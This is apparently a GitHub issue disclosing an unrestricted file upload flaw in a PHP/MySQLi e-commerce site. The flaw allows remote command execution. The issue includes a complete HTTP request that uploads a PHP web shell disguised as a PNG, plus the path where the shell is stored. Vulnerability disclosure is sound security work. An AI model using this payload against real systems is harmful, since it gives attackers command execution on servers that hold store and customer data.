Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Complete E-Commerce Site in PHP/MySQLi - Arbitrary file vulnerability uploading leads to command execution #3

Open
xuanluansec opened this issue Mar 20, 2024 · 1 comment
Open

Complete E-Commerce Site in PHP/MySQLi - Arbitrary file vulnerability uploading leads to command execution #3

xuanluansec opened this issue Mar 20, 2024 · 1 comment

Comments

@xuanluansec
Copy link

Complete E-Commerce Site in PHP/MySQLi - Arbitrary file vulnerability uploading leads to command execution

  • Author: onelastcrush

Vendor Homepage

Software Link

Overview

  • onelastcrush has discovered a vulnerability classified as critical in Complete E-Commerce Site in PHP/MySQLi V1.0. The function upload is affected. This operation will result in unrestricted uploads. Remote attacks can cause RCE.

Vulnerability Details

  • Complete E-Commerce Site in PHP/MySQLi V1.0
  • Vulnerable File: admin/products_photo.php
  • Parameter Names: filename
  • Attack Type: Remote

Description

  • A vulnerability, which was classified as critical, has been found in Complete E-Commerce Site in PHP/MySQLi. This issue affects the function upload. The manipulation with an unknown input leads to a unrestricted upload vulnerability.

Note

  • To exploit this vulnerability, users need to log in, and the website allows any user to register by default.

Proof of Concept (PoC) :

1 
POST /admin/products_photo.php HTTP/1.1
Host: www.ecommerce.com:8091
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------145108311014335905531894526533
Cookie: PHPSESSID=XXXXXXXXXX
Upgrade-Insecure-Requests: 1
Content-Length: 357

-----------------------------145108311014335905531894526533
Content-Disposition: form-data; name="photo"; filename="phpshell.php"
Content-Type: image/png

<?php system("dir");
-----------------------------145108311014335905531894526533
Content-Disposition: form-data; name="upload"

1
-----------------------------145108311014335905531894526533--
2

Location of vulnerabilities in source code

3
@xuanluansec
Copy link
Author

Note: the uploaded PHP file is images/_xxxx.php, where xxxx is the current timestamp.

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@xuanluansec